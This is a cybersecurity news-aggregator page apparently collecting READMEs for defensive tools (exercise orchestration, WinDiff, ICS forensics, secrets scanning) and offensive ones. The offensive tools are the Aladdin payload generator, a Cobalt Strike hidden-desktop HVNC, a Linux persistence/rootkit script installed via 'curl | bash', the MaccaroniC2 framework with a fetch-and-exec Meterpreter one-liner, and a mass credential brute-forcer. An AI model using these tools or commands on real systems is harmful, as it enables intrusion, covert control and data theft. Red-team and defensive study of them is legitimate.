All the latest Cybersecurity news in the media KitPloit

T3SF is a framework that offers a modular structure for the orchestration of events based on a master scenario events list (MSEL) together with a set of rules defined for each exercise (optional) and a configuration that allows defining the parameters of the corresponding platform. The main module performs the communication with the specific module (Discord, Slack, Telegram, etc.) that allows the events to present the events in the input channels as injects for each platform. In addition, the framework supports different use cases: "single organization, multiple areas", "multiple organization, single area" and "multiple organization, multiple areas". Getting Things Ready To use the framework with your desired platform, whether it's Slack or Discord, you will need to install the required modules for that platform. But don't worry, installing these modules is easy and straightforward. To do this, you can follow this simple step-by-step guide, or if you're already comfortable installing packages with pip, you can skip to the last step! # Python 3.6+ requiredpython -m venv .venv # We will create a python virtual environmentsource .venv/bin/activate # Let's get inside itpip install -U pip # Upgrade pip Once you have created a Python virtual environment and activated it, you can install the T3SF framework for your desired platform by running the following command: pip install "T3SF[Discord]" # Install the framework to work with Discord or pip install "T3SF[Slack]" # Install the framework to work with Slack This will install the T3SF framework along with the required dependencies for your chosen platform. Once the installation is complete, you can start using the framework with your platform of choice. We strongly recommend following the platform-specific guidance within our Read The Docs! Here are the links: Discord Slack Telegram WhatsApp Usage We created this framework to simplify all your work! Using Docker Supported Tags slack → This image has all the requirements to perform an exercise in Slack. discord → This image has all the requirements to perform an exercise in Discord. Using it with Slack $ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:slack Inside your .env file you have to provide the SLACK_BOT_TOKEN and SLACK_APP_TOKEN tokens. Read more about it here. There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable. Using it with Discord $ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:discord Inside your .env file you have to provide the DISCORD_TOKEN token. Read more about it here. There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable. Once you have everything ready, use our template for the main.py, or modify the following code: Here is an example if you want to run the framework with the Discord bot and a GUI. from T3SF import T3SFimport asyncioasync def main(): await T3SF.start(MSEL="MSEL_TTX.json", platform="Discord", gui=True)if __name__ == '__main__': asyncio.run(main()) Or if you prefer to run the framework without GUI and with Slack instead, you can modify the arguments, and that's it! Yes, that simple! await T3SF.start(MSEL="MSEL_TTX.json", platform="Slack", gui=False) If you need more help, you can always check our documentation here! Download T3SF

MSEL Slack

Aladdin is a payload generation technique based on the work of James Forshaw (@tiraniddo) that allows the deseriallization of a .NET payload and execution in memory. The original vector was documented on https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html. By spawning the process AddInProcess.exe with arguments /guid:32a91b0f-30cd-4c75-be79-ccbd6345de99 and /pid:, the process will start a named pipe under \.pipe32a91b0f-30cd-4c75-be79-ccbd6345de99 and will wait for a .NET Remoting object. If we generate a payload that has the appropiate packet bytes required to communicate with a .NET remoting listener we will be able to trigger the ActivitySurrogateSelector class from System.Workflow.ComponentModel. and gain code execution. Originally, James Forshaw released a POC at https://github.com/tyranid/DeviceGuardBypasses/tree/master/CreateAddInIpcData. However this POC will fail on recent versions of Windows since Microsoft went ahead and patched the vulnerable System.Workflow.ComponentModel (https://github.com/microsoft/dotnet-framework-early-access/blob/master/release-notes/NET48/dotnet-48-changes.md). Nick Landers (@monoxgas) however, identified a way to disable the check that Microsoft introduced and wrote a detailed article at https://www.netspi.com/blog/technical/adversary-simulation/re-animating-activitysurrogateselector/ . The bypass is documented at pwntester/ysoserial.net#41 . Aladdin is a payload generation tool, which using the specific bypass as well as the necessary header bytes of the .NET remoting protocol is able to generate initial access payloads that abuse the AddInProcess as originally documented. The provided templates are: * HTA* VBA* JS* CHM Notes In order for the attack to be successfull the .NET assembly must contain a single public class with an empty constructor to act as the entry point during deserialization. An example assembly has been included in the project. Usage Usage: -w, --scriptType=VALUE Set to js / hta / vba / chm. -o, --output=VALUE The generated output, e.g: -o C:UsersNettitudeDesktoppayload -a, --assembly=VALUE Provided Assembly DLL, e.g: -a C:UsersNettitudeDesktoppopcalc.dll -h, --help Help OpSec The user supplied .NET binary will be executed under the AddInProcess.exe that gets spawned from the HTA / JS payload. The spawning of the processes currently happens using the 9BA05972-F6A8-11CF-A442-00A0C90A8F39 COM object (https://dl.packetstormsecurity.net/papers/general/abusing-objects.pdf) which will launch the process as a child of Explorer.exe process. The GUID supplied in the process parameters of AddInProcess.exe can be user controlled. At the moment the guid is hardcoded in the template and the code. CHM executes the JScript through XSLT transformation Defensive Considerations Addinprocess.exe will always launch with /guid and /pid. Baseline your environment for legitimate uses - monitor the rest Useful References: * https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html* https://www.netspi.com/blog/technical/adversary-simulation/re-animating-activitysurrogateselector/ Readme / Credits Code is based on the following repos: * https://github.com/tyranid/DeviceGuardBypasses/tree/master/CreateAddInIpcData* https://github.com/pwntester/ysoserial.net Shouts to: @m0rv4i for helping with C# nuances @ace0fspad3s for troubleshooting @ Nettitude RT for being awesome Download Aladdin

Aladdin Generation Technique Payload Generation

WinDiff is an open-source web-based tool that allows browsing and comparing symbol, type and syscall information of Microsoft Windows binaries across different versions of the operating system. The binary database is automatically updated to include information from the latest Windows updates (including Insider Preview). It was inspired by ntdiff and made possible with the help of Winbindex. How It Works WinDiff is made of two parts: a CLI tool written in Rust and a web frontend written in TypeScript using the Next.js framework. The CLI tool is used to generate compressed JSON databases out of a configuration file and relies on Winbindex to find and download the required PEs (and PDBs). Types are reconstructed using resym. The idea behind the CLI tool is to be able to easily update and regenerate databases as new versions of Windows are released. The CLI tool's code is in the windiff_cli directory. The frontend is used to visualize the data generated by the CLI tool, in a user-friendly way. The frontend follows the same principle as ntdiff, as it allows browsing information extracted from official Microsoft PEs and PDBs for certain versions of Microsoft Windows and also allows comparing this information between versions. The frontend's code is in the windiff_frontend directory. A scheduled GitHub action fetches new updates from Winbindex every day and updates the configuration file used to generate the live version of WinDiff. Currently, because of (free plans) storage and compute limitations, only KB and Insider Preview updates less than one year old are kept for the live version. You can of course rebuild a local version of WinDiff yourself, without those limitations if you need to. See the next section for that. Note: Winbindex doesn't provide unique download links for 100% of the indexed files, so it might happen that some PEs' information are unavailable in WinDiff because of that. However, as soon as these PEs are on VirusTotal, Winbindex will be able to provide unique download links for them and they will then be integrated into WinDiff automatically. How to Build Prerequisites Rust 1.68 or superior Node.js 16.8 or superior Command-Line The full build of WinDiff is "self-documented" in ci/build_frontend.sh, which is the build script used to build the live version of WinDiff. Here's what's inside: # Resolve the project's root folderPROJECT_ROOT=$(git rev-parse --show-toplevel)# Generate databasescd "$PROJECT_ROOT/windiff_cli"cargo run --release "$PROJECT_ROOT/ci/db_configuration.json" "$PROJECT_ROOT/windiff_frontend/public/"# Build the frontendcd "$PROJECT_ROOT/windiff_frontend"npm cinpm run build The configuration file used to generate the data for the live version of WinDiff is located here: ci/db_configuration.json, but you can customize it or use your own. PRs aimed at adding new binaries to track in the live configuration are welcome. Download Windiff

Windiff Windows Binaries

Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++. There are four components of Hidden Desktop: BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process. HVNC shellcode: PIC implementation of TinyNuke HVNC. Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows. Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop. Usage Download the latest release or compile yourself using make. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with: HiddenDesktop <server> <port> You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop: hd-launch-edgehd-launch-explorerhd-launch-runhd-launch-cmdhd-launch-chrome You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command: hd-launch <command> [args] Demo Hidden.Desktop.mp4 Implementation Details The Aggressor script generates random pipe and desktop names. These are passed to the BOF initializer as arguments. The desktop name is stored in CS preferences at execution and is used by the application launcher BOFs. HVNC traffic is forwarded back to the team server using rportfwd. Status updates are sent back to Beacon through a named pipe. The BOF initializer starts by resolving the required modules and functions. Arguments from the Aggressor script are resolved. A pointer to a structure containing the arguments and function addresses is passed to the InputHandler function in the HVNC shellcode. It uses BeaconInjectProcess to execute the shellcode, meaning the behavior can be customized in a Malleable C2 profile or with process injection BOFs. You could modify Hidden Desktop to target remote processes, but this is not currently supported. This is done so the BOF can exit and the HVNC shellcode can continue running. InputHandler creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (OpenDesktopA) or created (CreateDesktopA). A new socket is established through a reverse port forward (rportfwd) to the HVNC server. The input handler creates a new thread for the DesktopHandler function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop. DesktopHandler establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server. Compatibility The HiddenDesktop BOF was tested using example.profile on the following Windows versions/architectures: Windows Server 2022 x64 Windows Server 2016 x64 Windows Server 2012 R2 x64 Windows Server 2008 x86 Windows 7 SP1 x64 Known Issues The start menu is not functional. Credits Heavily based on TinyNuke Included improvements/fixes from Meltedd/HVNC Uses Beacon job interface and project structure from SecIdiot/netntlm Download HiddenDesktop

HVNC HVNC server

HWB, for a better world in cyberspace. Hackers Without Borders is an international humanitarian association that provides emergency assistance to non-governmental institutions in the event of crises and disasters related to cyberattacks.

A Linux persistence tool! A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system.Features SSH Key Generation: Automatically generates SSH keys for covert access. Cronjob Persistence: Sets up cronjobs for scheduled persistence. Custom User with Root: Creates a custom user with root privileges. RCE Persistence: Achieves persistence through remote code execution. LKM/Rootkit: Demonstrates Linux Kernel Module (LKM) based rootkit persistence. Bashrc Persistence: Modifies user-specific shell initialization files for persistence. Systemd Service for Root: Sets up a systemd service for achieving root persistence. LD_PRELOAD Privilege Escalation Config: Configures LD_PRELOAD for privilege escalation. Backdooring Message of the Day / Header: Backdoors system message display for covert access. Modify an Existing Systemd Service: Manipulates an existing systemd service for persistence. Usage Clone this repository to your local machine: git clone https://github.com/Trevohack/DynastyPersist.git One linear curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash Support For support, email spaceshuttle.io.all@gmail.com or join our Discord server. Discord: https://discord.gg/WYzu65Hp Thank You! Download DynastyPersist

Linux Persistence Persistence Tool

MaccaroniC2 is a proof-of-concept Command and Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration. This tool is inspired for a specific scenario where the victim runs the AsyncSSH server and establishes a tunnel to the outside, ready to receive commands by the attacker. The attacker leverages the Ngrok official API to retrieve the hostname and port of the tunnel to establish a connection. This approach takes advantage of the comprehensive capabilities provided by AsyncSSH, including its integrated support for SFTP and SCP, facilitating secure and efficient data exfiltration and more. Moreover, the attacker can send and execute system commands using a SOCKS proxy, leveraging the benefits offered, for example, using TOR to enhance anonymity. Ngrok free account only allows the usage of one tunnel at a time. With some changes this tool could be perfect for a BOT-like C&C framework to control multiple SSH instances, but you would need to upgrade your plan on the Ngrok website, see https://ngrok.com/pricing Setup and Procedure Run python3 gen_rsa.py to generate a pair of SSH keys. The newly generated id_rsa is used by the attacker to connect to the server running on the victim's machine. Edit the asyncssh_server.py file and place the contents of the newly generated id_rsa.pub inside the pub_key variable. The asyncssh_server.py provide an implementation of the SSHv2 protocol with SFTP and SCP features. This is the script run by the victim. Create a free account on Ngrok site and take note of the AUTH Token. Add the AUTH token to the token variable in asyncssh_server.py, this needs to be harcoded inside the ngrok_tunnel() function. Create a free API key on the Ngrok website. Take note of the generated string. Put the API key string in the api_key variable inside the async_commander.py file. This allows us to automatically retrieve the Ngrok domain and port of the active tunnel during automation. Perform the same step for get_endpoints.py file. This script retrieves various useful information about active tunnels. Send commands to server With async_commander.py you can send any command to the server. It automatically requests the Ngrok tunnel's domain and port activated by the victim using Ngrok official API. Please note also that the id_rsa needs to be in the same folder of async_commander.py Basic Usage Run server on victim machine: python3 asyncssh_server.py From the attacker machine send command using socks proxy: python3 asyncssh_commander.py "ls -la" --proxy socks5://127.0.0.1:9050 Send command without using a proxy: python3 asyncssh_commander.py "whoami" Spawn another C2 agent (Powershell-Empire, Meterpreter, etc): python3 asyncssh_commander.py "powershell.exe -e ABJe...dhYte" Meterpreter web_delivery module python3 asyncssh_commander.py "python3 -c "import sys; import ssl; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]], fromlist=('urlopen',)); r=u.urlopen('http://100.100.100.100:8080/YnrVekAsVF', context=ssl._create_unverified_context()); exec(r.read());"" Get list of active tunnels: python3 get_endpoints.py Generate new RSA key pairs: python3 gen_rsa.py Advanced Usage Using SFTP and SCP - you don't need a valid username just the correct id_rsa With proxy: proxychains sftp -P NGROK_PORT -i id_rsa ddddd@NGROK_HOST scp -i id_rsa -o ProxyCommand="nc -x localhost:9050 %h NGROK_PORT" source_file ddddd@NGROK_HOST:destination_path No proxy: sftp -P PORT -i id_rsa ddddd@NGROK_HOST scp -i id_rsa -P PORT source_file ddddd@NGROK_HOST:destination_path Compiling with Nuitka python -m pip install nuitka python -m nuitka --standalone --onefile asyncssh_server.py Weaponized server https://github.com/hacktivesec/MaccaroniC2/blob/main/weaponized_server.py For furter information check the related article: https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/ DISCLAIMER: This tool is intended for testing and educational purposes only. It should only be used on systems with proper authorization. Any unauthorized or illegal use of this tool is strictly prohibited. The creator of this tool holds no responsibility for any misuse or damage caused by its usage. Please ensure compliance with applicable laws and regulations while utilizing this tool. Additionally, it's important to note that the usage of Ngrok in conjunction with this tool may result in the violation of the terms of service or policies of certain platforms. It is advisable to review and comply with the terms of use of any platform or service to avoid potential account bans or disruptions. Download MaccaroniC2

AsyncSSH Powerful AsyncSSH

Mass bruteforce network protocols Info Simple personal script to quickly mass bruteforce common services in a large scale of network. It will check for default credentials on ftp, ssh, mysql, mssql...etc. This was made for authorized red team penetration testing purpose only. How it works Use masscan(faster than nmap) to find alive hosts with common ports from network segment. Parse ips and ports from masscan result. Craft and run hydra commands to automatically bruteforce supported network services on devices. Requirements Kali linux or any preferred linux distribution Python 3.10+ # Clone the repogit clone https://github.com/opabravo/mass-brutercd mass-bruter# Install required tools for the scriptapt update && apt install seclists masscan hydra How To Use Private ip range : 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12 Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext> Ex: masscan_192.168.0.0-16.txt Example command: masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt Example Resume Command: masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt Command Options Bruteforce Script Options: -q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql, mssql, postgres, oracle) -a, --all Brute all services(Very Slow) -s, --show Show result with successful login -f, --file-path PATH The directory or file that contains masscan result [default: ./result/masscan/] --help Show this message and exit." dir="auto">┌──(root㉿root)-[~/mass-bruter]└─# python3 mass_bruteforce.pyUsage: [OPTIONS] Mass Bruteforce ScriptOptions: -q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql, mssql, postgres, oracle) -a, --all Brute all services(Very Slow) -s, --show Show result with successful login -f, --file-path PATH The directory or file that contains masscan result [default: ./result/masscan/] --help Show this message and exit. Quick Bruteforce Example: python3 mass_bruteforce.py -q -f ~/masscan_script.txt Fetch cracked credentials: python3 mass_bruteforce.py -s Todo Migrate with dpl4hydra Optimize the code and functions MultiProcessing Any contributions are welcomed! Download Mass-Bruter

Info Simple Mass Bruteforce masscan protocols Info Simple personal

OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost. I originally created this framework with an information security point of view. Since then, the response from other fields and disciplines has been incredible. I would love to be able to include any other OSINT resources, especially from fields outside of infosec. Please let me know about anything that might be missing! Please visit the framework at the link below and good hunting! https://osintframework.com Legend (T) - Indicates a link to a tool that must be installed and run locally (D) - Google Dork, for more information: Google Hacking (R) - Requires registration (M) - Indicates a URL that contains the search term and the URL itself must be edited manually For Update Notifications Follow me on Twitter: @jnordine - https://twitter.com/jnordine Watch or star the project on Github: https://github.com/lockfale/osint-framework Suggestions, Comments, Feedback Feedback or new tool suggestions are extremely welcome! Please feel free to submit a pull request or open an issue on github or reach out on Twitter. Contribute with a GitHub Pull Request For new resources, please ensure that the site is available for public and free use. Update the arf.json file in the format shown below. If this isn't the first entry for a folder, add a comma to the last closing brace of the previous entry. Submit pull request! Thank you! OSINT Framework Website https://osintframework.com Happy Hunting! Download OSINT-Framework

framework focused OSINT Framework OSINT resources

Service that scans your Infrastructure as Code for common vulnerabilities. Aspect Information Tool name IaC Scan Runner Docker image xscanner/runner PyPI package iac-scan-runner Documentation docs Contact us xopera@xlab.si Purpose and description The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) package and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info. Running This section explains how to run the REST API. Run with Docker You can run the REST API using a public xscanner/runner Docker image as follows: # run IaC Scan Runner REST API in a Docker container and # navigate to localhost:8080/swagger or localhost:8080/redoc$ docker run --name iac-scan-runner -p 8080:80 xscanner/runner Or you can build the image locally and run it as follows: # build Docker container (it will take some time) $ docker build -t iac-scan-runner .# run IaC Scan Runner REST API in a Docker container and # navigate to localhost:8080/swagger or localhost:8080/redoc$ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner Run from CLI To run using the IaC Scan Runner CLI: # install the CLI$ python3 -m venv .venv && . .venv/bin/activate(.venv) $ pip install iac-scan-runner# print OpenAPI specification(.venv) $ iac-scan-runner openapi# install prerequisites(.venv) $ iac-scan-runner install# run IaC Scan Runner REST API(.venv) $ iac-scan-runner run Run from source To run locally from source: # Export env variables export MONGODB_CONNECTION_STRING=mongodb://localhost:27017export SCAN_PERSISTENCE=enabledexport USER_MANAGEMENT=enabled# Setup MongoDB$ docker run --name mongodb -p 27017:27017 mongo# install prerequisites$ python3 -m venv .venv && . .venv/bin/activate(.venv) $ pip install -r requirements.txt(.venv) $ ./install-checks.sh# run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)(.venv) $ uvicorn src.iac_scan_runner.api:app Usage and examples This part will show one of the possible deployments and short examples on how to use API calls. Firstly we will clone the iac scan runner repository and run the API. $ git clone https://github.com/xlab-si/iac-scan-runner.git$ docker compose up After this is done you can use different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints. Lets create a project named test. curl -X 'POST' 'http://0.0.0.0/project?creator_id=test' -H 'accept: application/json' -d '' project id will be returned to us. For this example project id is 1e7b2a91-2896-40fd-8d53-83db56088026. For example, let say we want to initiate all check expect ansible-lint. Let's disable it. curl -X 'PUT' 'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' -H 'accept: application/json' Now when project is configured, we can simply choose files that we want to scan and zip them. For IaC-Scan-Runner to work files are expected to be a compressed archives (usually zip files). In this case response type will be json , but it is possible to change it to html.Please change YOUR.zip to path of your file. curl -X 'POST' 'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' -H 'accept: application/json' -H 'Content-Type: multipart/form-data' -F 'iac=@YOUR.zip;type=application/zip' That is it. Extending the scan workflow with new check tools At certain point, it might be required to include new check tools within the scan workflow, with aim to provide wider coverage of IaC standards and project types. Therefore, in this subsection, a sequence of required steps for that purpose is identified and described. However, the steps have to be performed manually as it will be described, but it is planned to automatize this procedure in future via API and provide user-friendly interface that will aid the user while importing new tools that will become part of the available catalogue that makes the scan workflow. Figure 16 depicts the required steps which have to be taken in order to extend the scan workflow with a new tool. Step 1 – Adding tool-specific class to checks directory First, it is required to add a new tool-specific Python class to the checks directory inside IaC Scan Runner's source code: iac-scan-runner/src/iac_scan_runner/checks/new_tool.py The class of a new tool inherits the existing Check class, which provides generalization of scan workflow tools. Moreover, it is necessary to provide implementation of the following methods: def configure(self, config_filename: Optional[str], secret: Optional[SecretStr]) def run(self, directory: str) While the first one aims to provide the necessary tool-specific parameters in order to set it up (such as passwords, client ids and tokens), another one specifies how the tool itself is invoked via API or CLI and its raw output returned. Step 2 – Adding the check tool class instance within ScanRunner constructor Once the new class derived from Check is added to the IaC Scan Runner's source code, it is also required to modify the source code of its main class, called ScanRunner. When it comes to modifications of this class, it is required first to import the tool-specific class, create a new check tool-specific class instance and adding it to the dictionary of IaC checks inside def init_checks(self). A. Importing the check tool class from iac_scan_runner.checks.tfsec import TfsecCheck B. Creating new instance of check tool object inside init_checks """Initiate predefined check objects""" new_tool = NewToolCheck() C. Adding it to self.iac_checks dictionary inside init_checks self.iac_checks = { new_tool.name: new_tool, … } Step 3 – Adding the check tool to the compatibility matrix inside Compatibility class On the other side, inside file src/iac_scan_runner/compatibility.py, the dictionary which represents compatibility matrix should be extended as well. There are two possible cases: a) new file type should be added as a key, together with list of relevant tools as value b) new tool should be added to the compatibility list for the existing file type. compatibility_matrix = { "new_type": ["new_tool_1", "new_tool_2"], … "old_typeK": ["tool_1", … "tool_N", "new_tool_3"] } Step 4 – Providing the support for result summarization Finally, the last step in sequence of required modifications for scan workflow extension is to modify class ResultsSummary (src/iac_scan_runner/results_summary.py). Precisely, it is required to append a part of the code to its method summarize_outcome that will look for specific strings which are tool-specific and can be used to identify whether the check passed or failed. Inside the loop that traverses the compatible checks, for each new tool the following structure of if-else should be included: if check == "new_tool": if outcome.find("Check pass string") > -1: self.outcomes[check]["status"] = "Passed" return "Passed" else: self.outcomes[check]["status"] = "Problems" return "Problems" Contact You can contact the xOpera team by sending an email to xopera@xlab.si. Acknowledgement This project has received funding from the European Union's Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE). Download Iac-Scan-Runner

IaC Scan Runner REST Scan Runner

Microsoft ICS Forensics Tools is an open source forensic framework for analyzing Industrial PLC metadata and project files. it enables investigators to identify suspicious artifacts on ICS environment for detection of compromised devices during incident response or manual check. open source framework, which allows investigators to verify the actions of the tool or customize it to specific needs. Getting Started These instructions will get you a copy of the project up and running on your local machine for development and testing purposes. git clone https://github.com/microsoft/ics-forensics-tools.git Prerequisites Install Python >= 3.9: https://www.python.org/downloads Installing Install python requirements pip install -r requirements.txt Usage General application arguments: Args Description Required / Optional -h, --help show this help message and exit Optional -s, --save-config Save config file for easy future usage Optional -c, --config Config file path, default is config.json Optional -o, --output-dir Directory in which to output any generated files, default is output Optional -v, --verbose Log output to a file as well as the console Optional -p, --multiprocess Run in multiprocess mode by number of plugins/analyzers Optional Specific plugin arguments: Args Description Required / Optional -h, --help show this help message and exit Optional --ip Addresses file path, CIDR or IP addresses csv (ip column required). add more columns for additional info about each ip (username, pass, etc...) Required --port Port number Optional --transport tcp/udp Optional --analyzer Analyzer name to run Optional Executing examples in the command line python driver.py -s -v PluginName --ip ips.csv python driver.py -s -v PluginName --analyzer AnalyzerName python driver.py -s -v -c config.json --multiprocess Import as library example from forensic.client.forensic_client import ForensicClientfrom forensic.interfaces.plugin import PluginConfigforensic = ForensicClient()plugin = PluginConfig.from_json({ "name": "PluginName", "port": 123, "transport": "tcp", "addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}], "parameters": { }, "analyzers": []})forensic.scan([plugin]) Architecture Adding Plugins When developing locally make sure to mark src folder as "Sources root" Create new directory under plugins folder with your plugin name Create new Python file with your plugin name Use the following template to write your plugin and replace 'General' with your plugin name from pathlib import Pathfrom forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLIfrom forensic.common.constants.constants import Transportclass GeneralCLI(PluginCLI): def __init__(self, folder_name): super().__init__(folder_name) self.name = "General" self.description = "General Plugin Description" self.port = 123 self.transport = Transport.TCP def flags(self, parser): self.base_flags(parser, self.port, self.transport) parser.add_argument('--general', help='General additional argument', metavar="")class General(PluginInterface): def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool): super().__init__(config, output_dir, verbose) def connect(self, address): self.logger.info(f"{self.config.name} connect") def export(self, extracted): self.logger.info(f"{self.config.name} export") Make sure to import your new plugin in the __init__.py file under the plugins folder In the PluginInterface inherited class there is 'config' parameters, you can use this to access any data that's available in the PluginConfig object (plugin name, addresses, port, transport, parameters). there are 2 mandatory functions (connect, export). the connect function receives single ip address and extracts any relevant information from the device and return it. the export function receives the information that was extracted from all the devices and there you can export it to file. In the PluginCLI inherited class you need to specify in the init function the default information related to this plugin. there is a single mandatory function (flags). In which you must call base_flags, and you can add any additional flags that you want to have. Adding Analyzers Create new directory under analyzers folder with the plugin name that related to your analyzer. Create new Python file with your analyzer name Use the following template to write your plugin and replace 'General' with your plugin name from pathlib import Pathfrom forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfigclass General(AnalyzerInterface): def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool): super().__init__(config, output_dir, verbose) self.plugin_name = 'General' self.create_output_dir(self.plugin_name) def analyze(self): pass Make sure to import your new analyzer in the __init__.py file under the analyzers folder Resources and Technical data & solution: Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments. Section 52 under MSRC blog ICS Lecture given about the tool Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube Contributing This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com. When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA. This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments. Trademarks This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.Download Ics-Forensics-Tools

ICS Forensics Industrial PLC PLC metadata

Yet another tool - why? Existing tools don't really "understand" code. Instead, they mostly parse texts. DeepSecrets expands classic regex-search approaches with semantic analysis, dangerous variable detection, and more efficient usage of entropy analysis. Code understanding supports 500+ languages and formats and is achieved by lexing and parsing - techniques commonly used in SAST tools. DeepSecrets also introduces a new way to find secrets: just use hashed values of your known secrets and get them found plain in your code. Under the hood story is in articles here: https://hackernoon.com/modernizing-secrets-scanning-part-1-the-problem Mini-FAQ after release :) Pff, is it still regex-based? Yes and no. Of course, it uses regexes and finds typed secrets like any other tool. But language understanding (the lexing stage) and variable detection also use regexes under the hood. So regexes is an instrument, not a problem. Why don't you build true abstract syntax trees? It's academically more correct! DeepSecrets tries to keep a balance between complexity and effectiveness. Building a true AST is a pretty complex thing and simply an overkill for our specific task. So the tool still follows the generic SAST-way of code analysis but optimizes the AST part using a different approach. I'd like to build my own semantic rules. How do I do that? Only through the code by the moment. Formalizing the rules and moving them into a flexible and user-controlled ruleset is in the plans. I still have a question Feel free to communicate with the maintainer Installation From Github via pip $ pip install git+https://github.com/avito-tech/deepsecrets.git From PyPi $ pip install deepsecrets Scanning The easiest way: $ deepsecrets --target-dir /path/to/your/code --outfile report.json This will run a scan against /path/to/your/code using the default configuration: Regex checks by the built-in ruleset Semantic checks (variable detection, entropy checks) Report will be saved to report.json Fine-tuning Run deepsecrets --help for details. Basically, you can use your own ruleset by specifying --regex-rules. Paths to be excluded from scanning can be set via --excluded-paths. Building rulesets Regex The built-in ruleset for regex checks is located in /deepsecrets/rules/regexes.json. You're free to follow the format and create a custom ruleset. HashedSecret Example ruleset for regex checks is located in /deepsecrets/rules/regexes.json. You're free to follow the format and create a custom ruleset. Contributing Under the hood There are several core concepts: File Tokenizer Token Engine Finding ScanMode File Just a pythonic representation of a file with all needed methods for management. Tokenizer A component able to break the content of a file into pieces - Tokens - by its logic. There are four types of tokenizers available: FullContentTokenizer: treats all content as a single token. Useful for regex-based search. PerWordTokenizer: breaks given content by words and line breaks. LexerTokenizer: uses language-specific smarts to break code into semantically correct pieces with additional context for each token. Token A string with additional information about its semantic role, corresponding file, and location inside it. Engine A component performing secrets search for a single token by its own logic. Returns a set of Findings. There are three engines available: RegexEngine: checks tokens' values through a special ruleset SemanticEngine: checks tokens produced by the LexerTokenizer using additional context - variable names and values HashedSecretEngine: checks tokens' values by hashing them and trying to find coinciding hashes inside a special ruleset Finding This is a data structure representing a problem detected inside code. Features information about the precise location inside a file and a rule that found it. ScanMode This component is responsible for the scan process. Defines the scope of analysis for a given work directory respecting exceptions Allows declaring a PerFileAnalyzer - the method called against each file, returning a list of findings. The primary usage is to initialize necessary engines, tokenizers, and rulesets. Runs the scan: a multiprocessing pool analyzes every file in parallel. Prepares results for output and outputs them. The current implementation has a CliScanMode built by the user-provided config through the cli args. Local development The project is supposed to be developed using VSCode and 'Remote containers' feature. Steps: Clone the repository Open the cloned folder with VSCode Agree with 'Reopen in container' Wait until the container is built and necessary extensions are installed You're ready Download 